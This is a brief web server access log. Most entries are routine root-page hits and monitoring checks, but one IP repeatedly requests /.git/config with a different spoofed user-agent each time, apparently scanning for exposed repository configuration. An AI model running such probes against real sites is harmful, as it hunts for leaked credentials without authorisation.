77.105.166.134 - - [03/Dec/2024:07:29:11 +0100] "GET / HTTP/1.0" 200 1229 "https://trendhub.tv/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
212.91.246.72 - - [03/Dec/2024:07:29:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.43 - - [03/Dec/2024:07:30:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.214.55.43 - - [03/Dec/2024:07:30:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/Dec/2024:07:30:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.79 - - [03/Dec/2024:07:31:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [03/Dec/2024:07:31:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Dec/2024:07:32:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.35 - - [03/Dec/2024:07:32:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.148.10.86 - - [03/Dec/2024:07:33:14 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.2; rv:127.0) Gecko/20100101 Firefox/127.0"
45.148.10.86 - - [03/Dec/2024:07:33:26 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.5.18"
45.148.10.86 - - [03/Dec/2024:07:33:31 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0"
45.148.10.86 - - [03/Dec/2024:07:33:43 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0"
45.148.10.86 - - [03/Dec/2024:07:33:46 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.22"
212.91.246.72 - - [03/Dec/2024:07:33:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.148.10.86 - - [03/Dec/2024:07:34:11 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.148.10.86 - - [03/Dec/2024:07:34:11 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
45.148.10.86 - - [03/Dec/2024:07:34:11 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15"
45.148.10.86 - - [03/Dec/2024:07:34:12 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.2.27"
45.148.10.86 - - [03/Dec/2024:07:34:20 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
